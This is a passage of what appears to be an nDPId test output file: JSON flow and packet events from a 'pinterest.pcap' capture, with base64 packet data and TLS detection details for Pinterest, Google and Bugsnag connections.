{"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","server_names":"*.pinterest.com,pinterest.in,*.pinterest.co,pinterest.co,*.pinterest.pe,pinterest.pe,*.pinterest.be,pinterest.be,*.pinterest.in,*.pinterest.ph,*.pinterest.ec,pinterest.ph,*.pinterest.cl,*.pinimg.com,*.pinterest.es,pinterest.es,*.pinterest.nz,pinterest.nz,pinterest.ec,pinterest.hu,pinterest.ca,pinterest.id,*.pinterest.nl,pinterest.nl,*.pinterest.tw,pinterest.tw,*.pinterest.th,pinterest.th,*.pinterest.id,*.pinterest.vn,*.pinterest.hu,pinterest.vn,*.pinterest.uk,pinterest.uk,*.pinterest.ru,pinterest.ru,*.pinterest.it,pinterest.it,pinterest.fr,pinterest.cl,*.pinterest.fr,*.pinterest.jp,*.pinterest.ca,pinterest.com,pin.it,*.pinterest.se,*.pinterest.pt,*.pinterest.mx,*.pinterest.kr,*.pinterest.ie,pinterest.engineering,*.pinterest.dk,*.pinterest.de,*.pinterest.ch,*.pinterest.at,*.pinterestmail.com,*.pinterest.engineering,*.pinterest.info,pinterest.info,pinimg.com,pinterestmail.com,pinterest.de,pinterest.dk,pinterest.ie,pinterest.jp,pinterest.kr,pinterest.mx,pinterest.pt,pinterest.se,pinterest.at,pinterest.ch,pinterest.co.at,*.pinterest.com.uy,pinterest.co.kr,pinterest.co.uk,*.pinterest.com.au,pinterest.com.au,pinterest.com.mx,*.pinterest.co.nz,pinterest.co.nz,pinterest.com.pe,pinterest.com.uy,*.pinterest.co.in,pinterest.com.py,*.pinterest.com.py,pinterest.com.bo,*.pinterest.com.bo,pinterest.com.ec,*.pinterest.com.ec,pinterest.co.in,*.pinterest.com.pe,*.pinterest.com.mx,pinterest.com.vn,*.pinterest.com.vn,*.pinterest.co.uk,*.pinterest.co.kr,*.pinterest.co.at,*.testing.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Pinterest, Inc., CN=*.pinterest.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"1E:D0:5D:9F:0D:82:46:B3:60:5F:11:FB:64:D5:28:35:37:40:7A:4E"}} +00612{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":159,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289714250,"flow_last_seen":1605289714250,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289714250,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33156,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":159,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1605289714250,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289714250,"pkt":"qtsDr8lk5EKm5WPyht1gA+BkACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXhUgYQBu4mXWd7qkQRvgBAJlouHAAABAQgKz6oyaMK4cmQ="} +00618{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":160,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289714250,"flow_last_seen":1605289714250,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289714250,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::2002","src_port":58726,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":160,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1605289714250,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289714250,"pkt":"qtsDr8lk5EKm5WPyht1gCIReACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICwAAAAAAACAC5WYBu2PBi7kDA7Y3gBAB9bhLAAABAQgKDEf\/5cK4cls="} +00612{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":161,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289714251,"flow_last_seen":1605289714251,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289714251,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::acd9:13e2","src_port":34626,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":161,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1605289714251,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289714251,"pkt":"qtsDr8lk5EKm5WPyht1gCQO3ACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACs2RPih0IBu\/o5BzSfc9\/MgBAB9chlAAABAQgK4ziLg8K4a4Y="} +00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":212,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1605289714281,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289714281,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPQBk\/5sAAAAAAAAAAJdleFQqAcsBIEmLB5kd7IUo3\/YpAbuBhOqRBG+Jl1nfgBAm9NLhAAABAQgKwrkiYM+oHbQ="} +00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":213,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1605289714288,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289714288,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPSoAFFBABwgLAAAAAAAAIAIqAcsBIEmLB5kd7IUo3\/YpAbvlZgMDtjdjwYu6gBAMIRHEAAABAQgKwrkiZwxF7DU="} +00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":214,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1605289714288,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289714288,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPQBk\/5sAAAAAAAAAAKzZE+IqAcsBIEmLB5kd7IUo3\/YpAbuHQp9z38z6OQc1gBALjSOBAAABAQgKwrkiaOM2b+4="} +00611{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":489,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289714558,"flow_last_seen":1605289714558,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605289714558,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2600:1901::7a0b::","src_port":47032,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":489,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1605289714558,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289714558,"pkt":"qtsDr8lk5EKm5WPyht1gA76\/ACgGQCoBywEgSYsHmR3shSjf9ikmABkBAAB6CwAAAAAAAAAAt7gBuycnOX0AAAAAoAL9IDgIAAACBAWgBAIICpXXZO8AAAAAAQMDBw=="} +00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":491,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1605289714581,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289714581,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSYAGQEAAHoLAAAAAAAAAAAqAcsBIEmLB5kd7IUo3\/YpAbu3uEYmtpAnJzl+oBJXgPrGAAACBAV4AQMDAwQCCArCuSOMlddk7w=="} +00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":492,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1605289714581,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289714581,"pkt":"qtsDr8lk5EKm5WPyht1gA76\/ACAGQCoBywEgSYsHmR3shSjf9ikmABkBAAB6CwAAAAAAAAAAt7gBuycnOX5GJraRgBAB+37BAAABAQgKlddlBsK5I4w="} +00938{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":493,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289714558,"flow_last_seen":1605289714581,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289714581,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2600:1901::7a0b::","src_port":47032,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"sessions.bugsnag.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00618{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":494,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289714590,"flow_last_seen":1605289714590,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605289714590,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2004","src_port":40694,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":494,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1605289714590,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289714590,"pkt":"qtsDr8lk5EKm5WPyht1gDTn6ACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIFgAAAAAAACAEnvYBu\/7qRGoAAAAAoAL9IGNfAAACBAWgBAIICskVTwYAAAAAAQMDBw=="} +00979{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":505,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289714558,"flow_last_seen":1605289714615,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605289714615,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2600:1901::7a0b::","src_port":47032,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"sessions.bugsnag.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":515,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1605289714616,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289714616,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgWAAAAAAAAIAQqAcsBIEmLB5kd7IUo3\/YpAbue9py+eGX+6kRroBJXgA2NAAACBAV4AQMDAwQCCArCuSOwyRVPBg=="} +00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":516,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1605289714616,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289714616,"pkt":"qtsDr8lk5EKm5WPyht1gDTn6ACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIFgAAAAAAACAEnvYBu\/7qRGucvnhmgBAB+5GEAAABAQgKyRVPIMK5I7A="} +00952{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":517,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289714590,"flow_last_seen":1605289714617,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289714617,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2004","src_port":40694,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.google.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00612{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":525,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289714658,"flow_last_seen":1605289714658,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605289714658,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33280,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":525,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1605289714658,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289714658,"pkt":"qtsDr8lk5EKm5WPyht1gCBesACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXhUggABu2pDSXwAAAAAoAL9ILsUAAACBAWgBAIICs+qM\/8AAAAAAQMDBw=="} +00993{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":528,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289714590,"flow_last_seen":1605289714660,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605289714660,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2004","src_port":40694,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.google.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00513{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":542,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1605289714697,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289714697,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleFQqAcsBIEmLB5kd7IUo3\/YpAbuCAAsx4c9qQ0l9oBJXgI0UAAACBAV4AQMDAwQCCArCuSQBz6oz\/w=="} +00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":543,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1605289714697,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289714697,"pkt":"qtsDr8lk5EKm5WPyht1gCBesACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXhUggABu2pDSX0LMeHQgBAB+xD+AAABAQgKz6o0J8K5JAE="} +00960{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":544,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289714658,"flow_last_seen":1605289714698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289714698,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33280,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"accounts.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01016{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":575,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289714658,"flow_last_seen":1605289714739,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605289714739,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33280,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"accounts.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +02797{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":583,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1605289714658,"flow_last_seen":1605289714740,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":5757,"flow_avg_l4_payload_len":411,"midstream":0,"thread_ts_msec":1605289714740,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33280,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"accounts.pinterest.com","server_names":"*.pinterest.com,pinterest.in,*.pinterest.co,pinterest.co,*.pinterest.pe,pinterest.pe,*.pinterest.be,pinterest.be,*.pinterest.in,*.pinterest.ph,*.pinterest.ec,pinterest.ph,*.pinterest.cl,*.pinimg.com,*.pinterest.es,pinterest.es,*.pinterest.nz,pinterest.nz,pinterest.ec,pinterest.hu,pinterest.ca,pinterest.id,*.pinterest.nl,pinterest.nl,*.pinterest.tw,pinterest.tw,*.pinterest.th,pinterest.th,*.pinterest.id,*.pinterest.vn,*.pinterest.hu,pinterest.vn,*.pinterest.uk,pinterest.uk,*.pinterest.ru,pinterest.ru,*.pinterest.it,pinterest.it,pinterest.fr,pinterest.cl,*.pinterest.fr,*.pinterest.jp,*.pinterest.ca,pinterest.com,pin.it,*.pinterest.se,*.pinterest.pt,*.pinterest.mx,*.pinterest.kr,*.pinterest.ie,pinterest.engineering,*.pinterest.dk,*.pinterest.de,*.pinterest.ch,*.pinterest.at,*.pinterestmail.com,*.pinterest.engineering,*.pinterest.info,pinterest.info,pinimg.com,pinterestmail.com,pinterest.de,pinterest.dk,pinterest.ie,pinterest.jp,pinterest.kr,pinterest.mx,pinterest.pt,pinterest.se,pinterest.at,pinterest.ch,pinterest.co.at,*.pinterest.com.uy,pinterest.co.kr,pinterest.co.uk,*.pinterest.com.au,pinterest.com.au,pinterest.com.mx,*.pinterest.co.nz,pinterest.co.nz,pinterest.com.pe,pinterest.com.uy,*.pinterest.co.in,pinterest.com.py,*.pinterest.com.py,pinterest.com.bo,*.pinterest.com.bo,pinterest.com.ec,*.pinterest.com.ec,pinterest.co.in,*.pinterest.com.pe,*.pinterest.com.mx,pinterest.com.vn,*.pinterest.com.vn,*.pinterest.co.uk,*.pinterest.co.kr,*.pinterest.co.at,*.testing.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Pinterest, Inc., CN=*.pinterest.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"1E:D0:5D:9F:0D:82:46:B3:60:5F:11:FB:64:D5:28:35:37:40:7A:4E"}} +00611{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":626,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289714782,"flow_last_seen":1605289714782,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605289714782,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::720","src_port":57050,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":626,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1605289714782,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289714782,"pkt":"qtsDr8lk5EKm5WPyht1gCp8uACgGQCoBywEgSYsHmR3shSjf9ikqBE5CAB0AAAAAAAAAAAcg3toBu85LuqIAAAAAoAL9IEOtAAACBAWgBAIICnRgZN4AAAAAAQMDBw=="} +00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":692,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1605289714832,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289714832,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoETkIAHQAAAAAAAAAAByAqAcsBIEmLB5kd7IUo3\/YpAbve2qyyOFrOS7qjoBJXgB0bAAACBAV4AQMDAwQCCArCuSSHdGBk3g=="} +00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":693,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1605289714832,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289714832,"pkt":"qtsDr8lk5EKm5WPyht1gCp8uACAGQCoBywEgSYsHmR3shSjf9ikqBE5CAB0AAAAAAAAAAAcg3toBu85LuqOssjhbgBAB+6D6AAABAQgKdGBlEMK5JIc="} +00937{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":694,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289714782,"flow_last_seen":1605289714833,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289714833,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::720","src_port":57050,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": 